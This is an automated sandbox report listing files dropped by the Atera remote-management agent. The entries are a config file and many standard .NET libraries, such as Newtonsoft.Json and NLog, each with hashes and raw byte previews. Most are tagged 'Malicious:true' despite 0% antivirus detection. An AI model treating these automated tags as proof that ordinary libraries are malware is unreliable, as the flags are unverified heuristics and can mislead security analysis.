                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                                                                  MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                                                                  SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=1.6

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):102448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190700491174632
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:hPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxBg:h2bYbYSWd85I5sSakFQhHL8/g
                                                                                                                                                                                                                                                                                                                                  MD5:266A4736FE6DFEADBC40C66AF39D3871
                                                                                                                                                                                                                                                                                                                                  SHA1:D090E63810691F78F760E55640B81958BC715183
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D6091013BF285AF05D901BA130E86D8CEFDB4E387540C3814929C1277C2DDF8
                                                                                                                                                                                                                                                                                                                                  SHA-512:AB43966CEFC08A8FE9B7A1787948F55A73B243CA6DE7259FD42E5BD4ABAE61D562C9642770708BA38AB6118D3755741529ED51E7DB2A8A811BE8B876F2922A8B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ....................................`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.998846079851237
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:GiLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7Hxlv:LZ0PMcjrgv
                                                                                                                                                                                                                                                                                                                                  MD5:C6339BD38794C9EB831004955DE64D16
                                                                                                                                                                                                                                                                                                                                  SHA1:EAE04876F94347538735F853B7F14778CB75180F
                                                                                                                                                                                                                                                                                                                                  SHA-256:855D0323807390D8F499355D0030685FBD6DC6939218A15059CB3E9C744AB1A4
                                                                                                                                                                                                                                                                                                                                  SHA-512:F62F76F305285F1C206AEFB8418E48BD2074DEC768C16986353305F34D17524E9A9AEA29AAE11B0D927247161F21039933B3EA68F2BC7F40623B471E123B33F7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..B..........R`... ........... ...............................+....`.................................._..O....................L..0(..........(_..8............................................ ............... ..H............text...X@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................3`......H........h................................................................(......}......}.......}.......}........o=...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po!...o....*..{....o0...r...p.(....(....o&...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.408406581403349
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:hQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxCl5E:h9MYn1seLE8JFMLcyMH7Hx+E
                                                                                                                                                                                                                                                                                                                                  MD5:7F8418A330DA75F653CC1A50F0B91175
                                                                                                                                                                                                                                                                                                                                  SHA1:7448DCCCDB8FBB1CC827FFE4861C7BD529EE85F5
                                                                                                                                                                                                                                                                                                                                  SHA-256:BF780EB84424039CAB84C818D21A402369EC1BDC9136E1CDBB60486343A07723
                                                                                                                                                                                                                                                                                                                                  SHA-512:3CAC7066B3F210D826383CA000CDC581C0CA193800C97F2F34C6139BB4880A12A485604344EF22BADFD4609F2A0E7645E81DECFA8C5BF8C6DF4406BFEE6DBFDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ........... ....................................`.....................................O.......4...............0(..........4...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................R.......H.......XE...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):354352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1536791121281995
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:4r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYyD:4hpp9xxIBeXGfvYyD
                                                                                                                                                                                                                                                                                                                                  MD5:697D8BC281B58B1FCEEC721B9BC01059
                                                                                                                                                                                                                                                                                                                                  SHA1:DA468B41FDADE096896B6835645DEFF110F438F5
                                                                                                                                                                                                                                                                                                                                  SHA-256:82C4EFE948B812C844DE4950130C292CDC49EDA42F447E17DE6CC451A1F5135E
                                                                                                                                                                                                                                                                                                                                  SHA-512:95877A2E690E083B256F71E376BE757FA0D329A6AAEC193461D325C63867BCE9E72A648EDB17A8817198C5224853541C65F664A6FFB966AE35D9E558F681EF46
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.Y..........." ..0..8..........nW... ...`....... ...................................`..................................W..O....`...............@..0(..........HV..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B................OW......H.......`...ht...................U........................................{*...*..{+...*V.(,.....}*.....}+...*...0..;........u......,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*. S]G. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*.0...........r...p......%..{*....................-.q.............-.&.+.......o3....%..{+....................-.q.............-.&.+.......o3....(4...*..{5...*..{6...*..{7...*..{8...*..(,.....}5.....}6.....}7......}8...*....0..k........u......,_(-

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071511091364285
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:m1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQ0:m1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                                                                                                                  MD5:1A5AE803BFFDEBA6B4D9825233D1C23C
                                                                                                                                                                                                                                                                                                                                  SHA1:E324D9B2F417F46FE3364658429B620BC5942322
                                                                                                                                                                                                                                                                                                                                  SHA-256:2BED7E5890D572E41770C422C25CF11F0D3C2D170C5F38F8EB1535E1A3E614C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:D8DCB1E227AD001A2F43C9847E0A22D43DBE7021814AB88DBD168092A3C172D17CB69848F743166E755DB771B55025664C0E53580B9E48252B1581AD281E332A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................q....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):702512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.943194897994663
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:3f9WGsSVSM2mxL2nRiOr8gUckc6V/g2GhBzj05cH3:vXNL2PVh6B+BzjmcX
                                                                                                                                                                                                                                                                                                                                  MD5:F78DB2C6B247E0FFC215A44AE88178D8
                                                                                                                                                                                                                                                                                                                                  SHA1:12FB14AE1CF731115F07076AD939A2ACC57A9920
                                                                                                                                                                                                                                                                                                                                  SHA-256:1DFF434970F52326AA5E0C1164AB76A771A1EE651E37166DF8A3BC3F06204746
                                                                                                                                                                                                                                                                                                                                  SHA-512:AF3F67FA56CA89111E389DE17F9030D979827E8B60AF86E991115B07759D6DADA1B74ED870B5163474192BF58A5FA69EBFB03DFCF087EB88E1E72EC26BB578CB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ....................................`.....................................O.......................0(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........z..<&..................<.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{[....3...{Z......(....,...{Z...*..{\.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285744
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190004154231823
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:uZAWecOmop6I4A9YzsRuBeXirS9/pcRykxxNKKV6S8mSrpsPngH:uZeZ6ANRIru9/pcMkoKV64SrWA
                                                                                                                                                                                                                                                                                                                                  MD5:2CD03F275D3BB90B106632F203DCAF64
                                                                                                                                                                                                                                                                                                                                  SHA1:025C716D6B123FA03DC9F97D4BF77D4AF20B75AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:B90619EBE88644BDA995505BDE5D5E282403E27FF7A55E273CC2FF9ACC88300A
                                                                                                                                                                                                                                                                                                                                  SHA-512:321660D33F6126077D4DC04AFBB341B9D46D07E2B38CF45F1C7B2C8B60A58A3F008390EE6F8B6995BECF4B0EADF66C9263D4BE67C8269F9A0851207650B9632D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....O..........." ..0..*...........H... ...`....... ....................................`..................................H..O....`..L............4..0(...........G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H.......Hd......................LG......................................^.{....,.(F...z..}.....*^.{....,.(F...z..}.....*"..(K...*"..(L...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117448325022863
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:/ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH9:Bgo0WPVTXgd
                                                                                                                                                                                                                                                                                                                                  MD5:BF59A9BBF620C0F06ED79180C868FCE0
                                                                                                                                                                                                                                                                                                                                  SHA1:2E8F9EF7A105A951790344A3B9ADC61DB35ABAAD
                                                                                                                                                                                                                                                                                                                                  SHA-256:CEBDB552DAC9E136F87E37A461B7683934F00AA2A74FBA15BC53ADFA38F1B79E
                                                                                                                                                                                                                                                                                                                                  SHA-512:C472376BD7A0E532CB8FDDA7ADDB00FB973D30F97368460929E8352C16BCB17EA92264C81E1E1E084566172ECE3D1513073D24B01990A808335D0C040039C6D3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ..............................\.....`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.678227546122444
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Xy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqq/dW:XuhMaVmzDC67EpYinAMxCwk
                                                                                                                                                                                                                                                                                                                                  MD5:181F16CCEBD4B02ACE42A02CC536ACA9
                                                                                                                                                                                                                                                                                                                                  SHA1:84795DA0255E288C96AC64F1C8150E81E0289FFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:80582DBDE89A6D9906721AD27562C7B2BEDE7048E4D461828D3BA2C4438E58E9
                                                                                                                                                                                                                                                                                                                                  SHA-512:73F93A3F4538FCE421A453B5A90AC662CC58D5A846AFECB8E337F33A1D643A81C8D02F5F3AECAE4CF00828A3103C63614F086E92ABD262317B13CF608784D72A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.235108733243218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:bzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWC:bzpjF0/t043e3vggr83jMYa/hU7HxVJU
                                                                                                                                                                                                                                                                                                                                  MD5:30BD9DF0841299E8FA11340B83A441B0
                                                                                                                                                                                                                                                                                                                                  SHA1:36447785062CB3DFDF9A1E03548EFD348760458F
                                                                                                                                                                                                                                                                                                                                  SHA-256:801BB92AA7A8840148FE548ECE4B7291C0E4FA73712FE2497074C925ECC906B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:830B821EE5BF401A6B95662EE191FC8BF08BF64D4D8BFBDB0E142D303AB241C41C4134883C0851B4D5DAF49F598454CE33595787C7084B4F9504794D9B07E54B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.................. ........... ....................................@.................................X...O.......................0(.......... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........J...g..........p...0.............................................{!...*:.(".....}!...*..0..#........u......,.(#....{!....{!...o$...*.*v ..yN )UU.Z(#....{!...o%...X*....0..M........r...p......%..{!....................-.q.............-.&.+.......o&....('...*..{(...*:.(".....}(...*.0..#........u......,.(#....{(....{(...o$...*.*v ..:. )UU.Z(#....{(...o%...X*....0..M........r-..p......%..{(....................-.q.............-.&.+.......o&....('...*..{)...*..{*...*V.("...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179673461309118
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ily:Mh0qjC5RMOHO420kN1Z
                                                                                                                                                                                                                                                                                                                                  MD5:37C069A058DC803C83C43DF6681907DA
                                                                                                                                                                                                                                                                                                                                  SHA1:ED522080452C472560A74F4B979BDC5CFE1643E7
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CD89ED91343ABF19DEF9EE1809AC28765EB3D63E5597583D3D183156D8B3C62
                                                                                                                                                                                                                                                                                                                                  SHA-512:1F38E4153FBFF9C996C3348A325AC3E9B43118D97F5E51B1099D09C61BFC4D772ADE110603D479403317AD76AD42F494E55A58E278F825EFBFA6E1ABEE246929
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......!.....@.................................3...O.... ..0...............0(...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
